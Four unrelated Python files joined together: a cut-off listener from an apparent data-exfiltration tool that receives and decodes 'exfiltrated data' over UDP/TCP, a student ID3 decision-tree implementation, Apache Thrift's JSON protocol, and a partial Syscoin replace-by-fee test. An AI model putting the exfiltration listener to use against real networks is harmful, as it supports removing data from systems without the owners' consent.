"Total sessions: {2}, Data: {3}B, Time: {4: .2f}s".format(
ip4_sessions_total, ip6_sessions_total,
ip4_sessions_total + ip6_sessions_total,
data_sent,
end_time - start_time)
)
if args.hashing:
print(
"[+] Exfiltrated data hash sum: {0}".format(
hex(hash_sum))
)
# Listen mode
if args.listen:
signal.signal(signal.SIGINT, signal_handler) # Terminate on Crl+C
if args.verbose >= 1:
print("[*] Listen mode")
if args.base64:
buffer_size = ceil(buffer_size * 1.5) # Increase receive buffer size
if not args.udp and not args.tcp:
if args.verbose >= 2:
print("[+] Defaulting to UDP protocol")
args.udp = True
if args.udp:
sock64 = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_DGRAM) # UDP
socket.SO_BINDTODEVICE = 25 # If not specified by system
sock64.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
sock64.bind(('::', port)) # Listen on both protocols
if args.verbose >= 1:
print(
"[*] Listening on {0} IPv4:'{1}'"
" IPv6:'{2}' port:{3} protocol:UDP".format(
args.interface, host4, host6, port)
)
while True:
data64, addr64 = sock64.recvfrom(buffer_size)
if data64:
if args.verbose >= 2:
print("\n[+] Received from {0}".format(addr64))
if args.base64:
if args.verbose >= 3:
print(
"\n[D] Base64 encoded data {0} bytes:\n{1}".format(
len(data64), data64)
)
data64 = base64.b64decode(data64)
if args.hashing:
hashsum(data64)
if args.verbose >= 2:
print(
"\n[+] Data block hash sum: {0}".format(
hex(hash_sum))
)
sys.stdout.buffer.write(data64)
else:
if args.keepalive: # TODO: Fix data output!
continue # data not output to stderr
else:
break
sock64.close()
if args.show_stat or args.verbose >= 1:
if args.hashing:
print(
"\n[+] Exfiltrated data hash sum: {0}".format(
hex(hash_sum))
)
if args.tcp:
sock64 = socket.socket(
socket.AF_INET6, # IPv6
socket.SOCK_STREAM) # TCP
socket.SO_BINDTODEVICE = 25 # If not specified by system
sock64.setsockopt(
socket.SOL_SOCKET,
socket.SO_BINDTODEVICE,
args.interface.encode())
sock64.bind(('::', port)) # Listen on both protocols
sock64.listen(1)
if args.verbose >= 1:
print(
"[*] Listening on {0} IPv4:'{1}'"
" IPv6:'{2}' port:{3} protocol:TCP".format(
args.interface, host4, host6, port)
)
while True:
conn64, addr64 = sock64.accept()
data64 = conn64.recv(buffer_size)
if data64:
if args.verbose >= 2:
print("\n[+] Received from {0}".format(addr64))
if args.base64:
if args.verbose >= 3:
print(
"\n[D] Base64 encoded data {0} bytes:\n{1}".format(
len(data64), data64)
)
data64 = base64.b64decode(data64)
if args.hashing:
hashsum(data64)
if args.verbose >= 2:
print(
"\n[+] Data block hash sum: {0}".format(
hex(hash_sum))
)
sys.stdout.buffer.write(data64)
else:
if args.keepalive: # TODO: Fix data output!
continue # data not output to stderr
else:
break
sock64.close()
if args.show_stat or args.verbose >= 1:
if args.hashing:
print(
"\n[+] Exfiltrated data hash sum: {0}".format(
hex(hash_sum))
)
|
|
#!/usr/bin/env python3
"""
Filename: id3.py
Author: Christopher Goes
Course: CS 404 Machine Learning and Data Mining
Semester: Spring 2016
Description: The ID3 algorithm
Book: Machine Learning: An Algorithmic Perspective
Github: https://github.com/GhostofGoes/cgoes-cs404
"""
import fileinput
import math
testing = False
input_debugging = False
# From page 251 in teh book
def calc_entropy(p):
if p != 0:
return -p * math.log2(p)
else:
return 0
# Based on code from pages 253 - 254 in the book
# Formula: Gain(S, F) = Entropy(S) - sum( len(Sf)/len(S) * Entropy(Sf)
def calc_info_gain(feature, values, examples, example_answers):
entropy_ans = 0 # Entropy(S)
entropy2 = 0 # sum( len(Sf) / len(S) * Entropy(Sf )
# Calculate Entropy for the set of all answers
for ans in list(set(example_answers)):
entropy_ans += calc_entropy(float(example_answers.count(ans)) / len(example_answers))
# for each possible value of a given feature
# sum( prob. of that value appearing * entropy of each subset that has that value )
for val in range(len(values[feature])):
temp = []
ents = 0
for e in range(len(examples)):
if examples[e][feature] == values[feature][val]:
temp.append(example_answers[e])
for exp in list(set(temp)): # Calc entropy of subset by calc. for each possible answer
ents += calc_entropy(float(temp.count(exp)) / len(temp))
entropy2 += (float(len(temp)) / len(examples)) * ents # Add entropy of subset to sum
return entropy_ans - entropy2 # Calculate the information gain
# Calculates the information gain for continuous values
def calc_continuous_info_gain(feature, features, data, data_answers):
entropy_ans = 0 # Entropy(S)
values = []
gains = []
# Calculate entropy for all the answers (same as in the normal info gain function)
for ans in list(set(data_answers)):
entropy_ans += calc_entropy(float(data_answers.count(ans)) / len(data_answers))
# Get all the continuous values
for i in range(len(data)):
values.append(float(data[i][feature]))
for val in values:
ents_less = 0
ents_more = 0
temp_less = []
temp_more = []
index = 0
for i in values:
if i <= val:
temp_less.append(i)
temp_less.append(data_answers[index])
elif i > val:
temp_more.append(i)
temp_more.append(data_answers[index])
index += 1
for l in list(set(temp_less)):
ents_less += calc_entropy(float(temp_less.count(l)) / len(temp_less))
gains.append((float(len(temp_less)) / len(data)) * ents_less)
for m in list(set(temp_more)):
ents_more += calc_entropy(float(temp_more.count(m)) / len(temp_more))
gains[-1] += (float(len(temp_more)) / len(data)) * ents_more
if testing:
print("values[stuff]:", values[gains.index(max(gains)) - 1])
return max(gains), values[gains.index(max(gains)) - 1] # Gain, Value we selected
# Based on algorithm on pages 255-256 in the book
def make_tree(data, data_answers, features, labels):
if not data: # No more data
return None
elif not features: # No more features, empty branch
return max(set(data_answers), key=data_answers.count) # http://stackoverflow.com/a/1518632/2214380
elif len(set(data_answers)) == 1: # One class remaining
return set(data_answers).pop()
else:
gains = []
cont_val = 0.0
# Choose best feature based on information gain
for feature in range(len(features)):
if "continuous" in features[feature]:
temp, cont_val = calc_continuous_info_gain(feature, features, data, data_answers)
if testing:
print("cont_val:", cont_val)
gains.append(temp)
break
else:
gains.append(calc_info_gain(feature, features, data, data_answers))
best_feature = gains.index(max(gains))
if testing:
print("best_feature:", best_feature)
tree = {labels[best_feature]: {}}
# Find possible feature values
for feature in features[best_feature]:
index = 0
new_data = []
less_new_data = []
more_new_data = []
new_answers = []
less_new_answers = []
more_new_answers = []
new_features = []
new_labels = []
if feature == "continuous":
for datapoint in data:
if float(datapoint[best_feature]) <= cont_val:
if best_feature == 0:
datapoint = datapoint[1:]
new_labels = labels[1:]
new_features = features[1:]
elif best_feature == len(features):
datapoint = datapoint[:-1]
new_labels = labels[:-1]
new_features = features[:-1]
else:
new_datapoint = datapoint[:best_feature]
new_datapoint.extend(datapoint[best_feature + 1:])
datapoint = new_datapoint
new_labels = labels[:best_feature]
new_labels.extend(labels[best_feature + 1:])
new_features = features[:best_feature]
new_features.extend(features[best_feature + 1:])
less_new_data.append(datapoint)
less_new_answers.append(data_answers[index])
elif float(datapoint[best_feature]) > cont_val:
if best_feature == 0:
datapoint = datapoint[1:]
new_labels = labels[1:]
new_features = features[1:]
elif best_feature == len(features):
datapoint = datapoint[:-1]
new_labels = labels[:-1]
new_features = features[:-1]
else:
new_datapoint = datapoint[:best_feature]
new_datapoint.extend(datapoint[best_feature + 1:])
datapoint = new_datapoint
new_labels = labels[:best_feature]
new_labels.extend(labels[best_feature + 1:])
new_features = features[:best_feature]
new_features.extend(features[best_feature + 1:])
more_new_data.append(datapoint)
more_new_answers.append(data_answers[index])
index += 1
less_subtree = make_tree(less_new_data, less_new_answers, new_features, new_labels)
more_subtree = make_tree(more_new_data, more_new_answers, new_features, new_labels)
tree[labels[best_feature]]["less " + str(cont_val)] = less_subtree
tree[labels[best_feature]]["more " + str(cont_val)] = more_subtree
# Not continuous
else:
for datapoint in data:
if datapoint[best_feature] == feature:
if best_feature == 0:
datapoint = datapoint[1:]
new_labels = labels[1:]
new_features = features[1:]
elif best_feature == len(features):
datapoint = datapoint[:-1]
new_labels = labels[:-1]
new_features = features[:-1]
else: # Error in books code: datapoint is being overwritten before reuse. Thanks Keith!
new_datapoint = datapoint[:best_feature]
new_datapoint.extend(datapoint[best_feature+1:])
datapoint = new_datapoint
new_labels = labels[:best_feature]
new_labels.extend(labels[best_feature+1:])
new_features = features[:best_feature]
new_features.extend(features[best_feature+1:])
new_data.append(datapoint)
new_answers.append(data_answers[index])
index += 1
subtree = make_tree(new_data, new_answers, new_features, new_labels)
tree[labels[best_feature]][feature] = subtree
return tree
def print_tree(tree, depth=0):
if tree is None:
pass
elif type(tree) == str or type(tree) == int:
print(" " * depth, tree)
else:
for key in tree:
for val in tree[key]:
if "less" in val:
print(" " * depth, key, "<=", val.split()[-1], ":")
elif "more" in val:
print(" " * depth, key, ">", val.split()[-1], ":")
else:
print(" " * depth, key, "=", val, ":")
print_tree(tree[key][val], depth + 1)
def id3():
labels = []
features = []
answers = []
examples = []
example_answers = []
for line in fileinput.input():
linenum = fileinput.lineno()
if linenum == 1:
num_features = int(line)
elif linenum <= num_features + 1:
temp = line.split()
labels.append(temp[0])
features.append(temp[1:])
elif linenum == num_features + 2:
temp = line.split()
answers = temp[1:]
else:
temp = line.split()
examples.append(temp[:-1])
example_answers.append((temp[-1]))
if input_debugging:
print("Input filename:", fileinput.filename())
print("num_features:", num_features)
for label, feature in zip(labels, features):
print('{:15}'.format(label + ': '), end="", flush=True)
print(feature)
print('\n', answers)
for example, ans in zip(examples, example_answers):
print('{:15}'.format(ans + ': '), end="", flush=True)
print(example)
tree = make_tree(examples, example_answers, features, labels)
print_tree(tree)
# Execute Order 66
id3()
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from TProtocol import TType, TProtocolBase, TProtocolException
import base64
import json
import math
__all__ = ['TJSONProtocol',
'TJSONProtocolFactory',
'TSimpleJSONProtocol',
'TSimpleJSONProtocolFactory']
VERSION = 1
COMMA = ','
COLON = ':'
LBRACE = '{'
RBRACE = '}'
LBRACKET = '['
RBRACKET = ']'
QUOTE = '"'
BACKSLASH = '\\'
ZERO = '0'
ESCSEQ = '\\u00'
ESCAPE_CHAR = '"\\bfnrt'
ESCAPE_CHAR_VALS = ['"', '\\', '\b', '\f', '\n', '\r', '\t']
NUMERIC_CHAR = '+-.0123456789Ee'
CTYPES = {TType.BOOL: 'tf',
TType.BYTE: 'i8',
TType.I16: 'i16',
TType.I32: 'i32',
TType.I64: 'i64',
TType.DOUBLE: 'dbl',
TType.STRING: 'str',
TType.STRUCT: 'rec',
TType.LIST: 'lst',
TType.SET: 'set',
TType.MAP: 'map'}
JTYPES = {}
for key in CTYPES.keys():
JTYPES[CTYPES[key]] = key
class JSONBaseContext(object):
def __init__(self, protocol):
self.protocol = protocol
self.first = True
def doIO(self, function):
pass
def write(self):
pass
def read(self):
pass
def escapeNum(self):
return False
def __str__(self):
return self.__class__.__name__
class JSONListContext(JSONBaseContext):
def doIO(self, function):
if self.first is True:
self.first = False
else:
function(COMMA)
def write(self):
self.doIO(self.protocol.trans.write)
def read(self):
self.doIO(self.protocol.readJSONSyntaxChar)
class JSONPairContext(JSONBaseContext):
def __init__(self, protocol):
super(JSONPairContext, self).__init__(protocol)
self.colon = True
def doIO(self, function):
if self.first:
self.first = False
self.colon = True
else:
function(COLON if self.colon else COMMA)
self.colon = not self.colon
def write(self):
self.doIO(self.protocol.trans.write)
def read(self):
self.doIO(self.protocol.readJSONSyntaxChar)
def escapeNum(self):
return self.colon
def __str__(self):
return '%s, colon=%s' % (self.__class__.__name__, self.colon)
class LookaheadReader():
hasData = False
data = ''
def __init__(self, protocol):
self.protocol = protocol
def read(self):
if self.hasData is True:
self.hasData = False
else:
self.data = self.protocol.trans.read(1)
return self.data
def peek(self):
if self.hasData is False:
self.data = self.protocol.trans.read(1)
self.hasData = True
return self.data
class TJSONProtocolBase(TProtocolBase):
def __init__(self, trans):
TProtocolBase.__init__(self, trans)
self.resetWriteContext()
self.resetReadContext()
def resetWriteContext(self):
self.context = JSONBaseContext(self)
self.contextStack = [self.context]
def resetReadContext(self):
self.resetWriteContext()
self.reader = LookaheadReader(self)
def pushContext(self, ctx):
self.contextStack.append(ctx)
self.context = ctx
def popContext(self):
self.contextStack.pop()
if self.contextStack:
self.context = self.contextStack[-1]
else:
self.context = JSONBaseContext(self)
def writeJSONString(self, string):
self.context.write()
self.trans.write(json.dumps(string))
def writeJSONNumber(self, number):
self.context.write()
jsNumber = str(number)
if self.context.escapeNum():
jsNumber = "%s%s%s" % (QUOTE, jsNumber, QUOTE)
self.trans.write(jsNumber)
def writeJSONBase64(self, binary):
self.context.write()
self.trans.write(QUOTE)
self.trans.write(base64.b64encode(binary))
self.trans.write(QUOTE)
def writeJSONObjectStart(self):
self.context.write()
self.trans.write(LBRACE)
self.pushContext(JSONPairContext(self))
def writeJSONObjectEnd(self):
self.popContext()
self.trans.write(RBRACE)
def writeJSONArrayStart(self):
self.context.write()
self.trans.write(LBRACKET)
self.pushContext(JSONListContext(self))
def writeJSONArrayEnd(self):
self.popContext()
self.trans.write(RBRACKET)
def readJSONSyntaxChar(self, character):
current = self.reader.read()
if character != current:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Unexpected character: %s" % current)
def readJSONString(self, skipContext):
string = []
if skipContext is False:
self.context.read()
self.readJSONSyntaxChar(QUOTE)
while True:
character = self.reader.read()
if character == QUOTE:
break
if character == ESCSEQ[0]:
character = self.reader.read()
if character == ESCSEQ[1]:
self.readJSONSyntaxChar(ZERO)
self.readJSONSyntaxChar(ZERO)
character = json.JSONDecoder().decode(b'"\u00%s"' % self.trans.read(2))
else:
off = ESCAPE_CHAR.find(character)
if off == -1:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Expected control char")
character = ESCAPE_CHAR_VALS[off]
string.append(character)
return ''.join(string)
def isJSONNumeric(self, character):
return (True if NUMERIC_CHAR.find(character) != - 1 else False)
def readJSONQuotes(self):
if (self.context.escapeNum()):
self.readJSONSyntaxChar(QUOTE)
def readJSONNumericChars(self):
numeric = []
while True:
character = self.reader.peek()
if self.isJSONNumeric(character) is False:
break
numeric.append(self.reader.read())
return ''.join(numeric)
def readJSONInteger(self):
self.context.read()
self.readJSONQuotes()
numeric = self.readJSONNumericChars()
self.readJSONQuotes()
try:
return int(numeric)
except ValueError:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Bad data encounted in numeric data")
def readJSONDouble(self):
self.context.read()
if self.reader.peek() == QUOTE:
string = self.readJSONString(True)
try:
double = float(string)
if (self.context.escapeNum is False and
not math.isinf(double) and
not math.isnan(double)):
raise TProtocolException(TProtocolException.INVALID_DATA,
"Numeric data unexpectedly quoted")
return double
except ValueError:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Bad data encounted in numeric data")
else:
if self.context.escapeNum() is True:
self.readJSONSyntaxChar(QUOTE)
try:
return float(self.readJSONNumericChars())
except ValueError:
raise TProtocolException(TProtocolException.INVALID_DATA,
"Bad data encounted in numeric data")
def readJSONBase64(self):
string = self.readJSONString(False)
return base64.b64decode(string)
def readJSONObjectStart(self):
self.context.read()
self.readJSONSyntaxChar(LBRACE)
self.pushContext(JSONPairContext(self))
def readJSONObjectEnd(self):
self.readJSONSyntaxChar(RBRACE)
self.popContext()
def readJSONArrayStart(self):
self.context.read()
self.readJSONSyntaxChar(LBRACKET)
self.pushContext(JSONListContext(self))
def readJSONArrayEnd(self):
self.readJSONSyntaxChar(RBRACKET)
self.popContext()
class TJSONProtocol(TJSONProtocolBase):
def readMessageBegin(self):
self.resetReadContext()
self.readJSONArrayStart()
if self.readJSONInteger() != VERSION:
raise TProtocolException(TProtocolException.BAD_VERSION,
"Message contained bad version.")
name = self.readJSONString(False)
typen = self.readJSONInteger()
seqid = self.readJSONInteger()
return (name, typen, seqid)
def readMessageEnd(self):
self.readJSONArrayEnd()
def readStructBegin(self):
self.readJSONObjectStart()
def readStructEnd(self):
self.readJSONObjectEnd()
def readFieldBegin(self):
character = self.reader.peek()
ttype = 0
id = 0
if character == RBRACE:
ttype = TType.STOP
else:
id = self.readJSONInteger()
self.readJSONObjectStart()
ttype = JTYPES[self.readJSONString(False)]
return (None, ttype, id)
def readFieldEnd(self):
self.readJSONObjectEnd()
def readMapBegin(self):
self.readJSONArrayStart()
keyType = JTYPES[self.readJSONString(False)]
valueType = JTYPES[self.readJSONString(False)]
size = self.readJSONInteger()
self.readJSONObjectStart()
return (keyType, valueType, size)
def readMapEnd(self):
self.readJSONObjectEnd()
self.readJSONArrayEnd()
def readCollectionBegin(self):
self.readJSONArrayStart()
elemType = JTYPES[self.readJSONString(False)]
size = self.readJSONInteger()
return (elemType, size)
readListBegin = readCollectionBegin
readSetBegin = readCollectionBegin
def readCollectionEnd(self):
self.readJSONArrayEnd()
readSetEnd = readCollectionEnd
readListEnd = readCollectionEnd
def readBool(self):
return (False if self.readJSONInteger() == 0 else True)
def readNumber(self):
return self.readJSONInteger()
readByte = readNumber
readI16 = readNumber
readI32 = readNumber
readI64 = readNumber
def readDouble(self):
return self.readJSONDouble()
def readString(self):
return self.readJSONString(False)
def readBinary(self):
return self.readJSONBase64()
def writeMessageBegin(self, name, request_type, seqid):
self.resetWriteContext()
self.writeJSONArrayStart()
self.writeJSONNumber(VERSION)
self.writeJSONString(name)
self.writeJSONNumber(request_type)
self.writeJSONNumber(seqid)
def writeMessageEnd(self):
self.writeJSONArrayEnd()
def writeStructBegin(self, name):
self.writeJSONObjectStart()
def writeStructEnd(self):
self.writeJSONObjectEnd()
def writeFieldBegin(self, name, ttype, id):
self.writeJSONNumber(id)
self.writeJSONObjectStart()
self.writeJSONString(CTYPES[ttype])
def writeFieldEnd(self):
self.writeJSONObjectEnd()
def writeFieldStop(self):
pass
def writeMapBegin(self, ktype, vtype, size):
self.writeJSONArrayStart()
self.writeJSONString(CTYPES[ktype])
self.writeJSONString(CTYPES[vtype])
self.writeJSONNumber(size)
self.writeJSONObjectStart()
def writeMapEnd(self):
self.writeJSONObjectEnd()
self.writeJSONArrayEnd()
def writeListBegin(self, etype, size):
self.writeJSONArrayStart()
self.writeJSONString(CTYPES[etype])
self.writeJSONNumber(size)
def writeListEnd(self):
self.writeJSONArrayEnd()
def writeSetBegin(self, etype, size):
self.writeJSONArrayStart()
self.writeJSONString(CTYPES[etype])
self.writeJSONNumber(size)
def writeSetEnd(self):
self.writeJSONArrayEnd()
def writeBool(self, boolean):
self.writeJSONNumber(1 if boolean is True else 0)
def writeInteger(self, integer):
self.writeJSONNumber(integer)
writeByte = writeInteger
writeI16 = writeInteger
writeI32 = writeInteger
writeI64 = writeInteger
def writeDouble(self, dbl):
self.writeJSONNumber(dbl)
def writeString(self, string):
self.writeJSONString(string)
def writeBinary(self, binary):
self.writeJSONBase64(binary)
class TJSONProtocolFactory:
def getProtocol(self, trans):
return TJSONProtocol(trans)
class TSimpleJSONProtocol(TJSONProtocolBase):
"""Simple, readable, write-only JSON protocol.
Useful for interacting with scripting languages.
"""
def readMessageBegin(self):
raise NotImplementedError()
def readMessageEnd(self):
raise NotImplementedError()
def readStructBegin(self):
raise NotImplementedError()
def readStructEnd(self):
raise NotImplementedError()
def writeMessageBegin(self, name, request_type, seqid):
self.resetWriteContext()
def writeMessageEnd(self):
pass
def writeStructBegin(self, name):
self.writeJSONObjectStart()
def writeStructEnd(self):
self.writeJSONObjectEnd()
def writeFieldBegin(self, name, ttype, fid):
self.writeJSONString(name)
def writeFieldEnd(self):
pass
def writeMapBegin(self, ktype, vtype, size):
self.writeJSONObjectStart()
def writeMapEnd(self):
self.writeJSONObjectEnd()
def _writeCollectionBegin(self, etype, size):
self.writeJSONArrayStart()
def _writeCollectionEnd(self):
self.writeJSONArrayEnd()
writeListBegin = _writeCollectionBegin
writeListEnd = _writeCollectionEnd
writeSetBegin = _writeCollectionBegin
writeSetEnd = _writeCollectionEnd
def writeInteger(self, integer):
self.writeJSONNumber(integer)
writeByte = writeInteger
writeI16 = writeInteger
writeI32 = writeInteger
writeI64 = writeInteger
def writeBool(self, boolean):
self.writeJSONNumber(1 if boolean is True else 0)
def writeDouble(self, dbl):
self.writeJSONNumber(dbl)
def writeString(self, string):
self.writeJSONString(string)
def writeBinary(self, binary):
self.writeJSONBase64(binary)
class TSimpleJSONProtocolFactory(object):
def getProtocol(self, trans):
return TSimpleJSONProtocol(trans)
|
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RBF code."""
from decimal import Decimal
from test_framework.messages import COIN, COutPoint, CTransaction, CTxIn, CTxOut
from test_framework.script import CScript, OP_DROP
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, satoshi_round
from test_framework.script_util import DUMMY_P2WPKH_SCRIPT
MAX_REPLACEMENT_LIMIT = 100
def txToHex(tx):
return tx.serialize().hex()
def make_utxo(node, amount, confirmed=True, scriptPubKey=DUMMY_P2WPKH_SCRIPT):
"""Create a txout with a given amount and scriptPubKey
Mines coins as needed.
confirmed - txouts created will be confirmed in the blockchain;
unconfirmed otherwise.
"""
fee = 1*COIN
while node.getbalance() < satoshi_round((amount + fee)/COIN):
node.generate(100)
new_addr = node.getnewaddress()
txid = node.sendtoaddress(new_addr, satoshi_round((amount+fee)/COIN))
tx1 = node.getrawtransaction(txid, 1)
txid = int(txid, 16)
i = None
for i, txout in enumerate(tx1['vout']):
if txout['scriptPubKey']['addresses'] == [new_addr]:
break
assert i is not None
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(txid, i))]
tx2.vout = [CTxOut(amount, scriptPubKey)]
tx2.rehash()
signed_tx = node.signrawtransactionwithwallet(txToHex(tx2))
txid = node.sendrawtransaction(signed_tx['hex'], 0)
# If requested, ensure txouts are confirmed.
if confirmed:
mempool_size = len(node.getrawmempool())
while mempool_size > 0:
node.generate(1)
new_size = len(node.getrawmempool())
# Error out if we have something stuck in the mempool, as this
# would likely be a bug.
assert new_size < mempool_size
mempool_size = new_size
return COutPoint(int(txid, 16), 0)
class ReplaceByFeeTest(SyscoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [
[
"-acceptnonstdtxn=1",
"-maxorphantx=1000",
"-limitancestorcount=50",
"-limitancestorsize=101",
"-limitdescendantcount=200",
"-limitdescendantsize=101",
],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Leave IBD
self.nodes[0].generate(1)
make_utxo(self.nodes[0], 1*COIN)
# Ensure nodes are synced
self.sync_all()
self.log.info("Running test simple doublespend...")
self.test_simple_doublespend()
self.log.info("Running test doublespend chain...")
self.test_doublespend_chain()
self.log.info("Running test doublespend tree...")
self.test_doublespend_tree()
self.log.info("Running test replacement feeperkb...")
self.test_replacement_feeperkb()
self.log.info("Running test spends of conflicting outputs...")
self.test_spends_of_conflicting_outputs()
self.log.info("Running test new unconfirmed inputs...")
self.test_new_unconfirmed_inputs()
self.log.info("Running test too many replacements...")
self.test_too_many_replacements()
self.log.info("Running test opt-in...")
self.test_opt_in()
self.log.info("Running test RPC...")
self.test_rpc()
self.log.info("Running test prioritised transactions...")
self.test_prioritised_transactions()
self.log.info("Passed")
def test_simple_doublespend(self):
"""Simple doublespend"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# make_utxo may have generated a bunch of blocks, so we need to sync
# before we can spend the coins generated, or else the resulting
# transactions might not be accepted by our peers.
self.sync_all()
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, 0)
self.sync_all()
# Should fail because we haven't changed the fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT + b'a')]
tx1b_hex = txToHex(tx1b)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, tx1b_hex, 0)
# Extra 0.1 SYS fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9 * COIN), DUMMY_P2WPKH_SCRIPT)]
tx1b_hex = txToHex(tx1b)
# Works when enabled
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, 0)
mempool = self.nodes[0].getrawmempool()
assert tx1a_txid not in mempool
assert tx1b_txid in mempool
assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))
def test_doublespend_chain(self):
"""Doublespend of a long chain"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
prevout = tx0_outpoint
remaining_value = initial_nValue
chain_txids = []
while remaining_value > 10*COIN:
remaining_value -= 1*COIN
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = [CTxOut(remaining_value, CScript([1, OP_DROP] * 15 + [1]))]
tx_hex = txToHex(tx)
txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
chain_txids.append(txid)
prevout = COutPoint(int(txid, 16), 0)
# Whether the double-spend is allowed is evaluated by including all
# child fees - 40 SYS - so this attempt is rejected.
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 30 * COIN, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
# Accepted with sufficient fee
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
mempool = self.nodes[0].getrawmempool()
for doublespent_txid in chain_txids:
assert doublespent_txid not in mempool
def test_doublespend_tree(self):
"""Doublespend of a big tree of transactions"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.0001*COIN, _total_txs=None):
if _total_txs is None:
_total_txs = [0]
if _total_txs[0] >= max_txs:
return
txout_value = (initial_value - fee) // tree_width
if txout_value < fee:
return
vout = [CTxOut(txout_value, CScript([i+1]))
for i in range(tree_width)]
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = vout
tx_hex = txToHex(tx)
assert len(tx.serialize()) < 100000
txid = self.nodes[0].sendrawtransaction(tx_hex, 0)
yield tx
_total_txs[0] += 1
txid = int(txid, 16)
for i, txout in enumerate(tx.vout):
for x in branch(COutPoint(txid, i), txout_value,
max_txs,
tree_width=tree_width, fee=fee,
_total_txs=_total_txs):
yield x
fee = int(0.0001*COIN)
n = MAX_REPLACEMENT_LIMIT
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
# Attempt double-spend, will fail because too little fee paid
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee * n, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
# This will raise an exception due to insufficient fee
assert_raises_rpc_error(-26, "insufficient fee", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
# 1 SYS fee is enough
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee * n - 1 * COIN, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, 0)
mempool = self.nodes[0].getrawmempool()
for tx in tree_txs:
tx.rehash()
assert tx.hash not in mempool
# Try again, but with more total transactions than the "max txs
# double-spent at once" anti-DoS limit.
for n in (MAX_REPLACEMENT_LIMIT+1, MAX_REPLACEMENT_LIMIT*2):
fee = int(0.0001*COIN)
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 2 * fee * n, DUMMY_P2WPKH_SCRIPT)]
dbl_tx_hex = txToHex(dbl_tx)
# This will raise an exception
assert_raises_rpc_error(-26, "too many potential replacements", self.nodes[0].sendrawtransaction, dbl_tx_hex, 0)
for tx in tree_txs:
tx.rehash()
self.nodes[0].getrawtransaction(tx.hash)
def test_replacement_feeperkb(self):
"""Replacement requires fee-per-KB to be higher"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1 * COIN, DUMMY_P2WPKH_SCRIPT)]
tx1a_hex = txToHex(tx1a)
self.nodes[0].sendrawtransaction(tx1a_hex, 0)
# Higher fee, but the fee per KB is much lower, so the replacement is
# rejected.
tx1b = CTransaction()
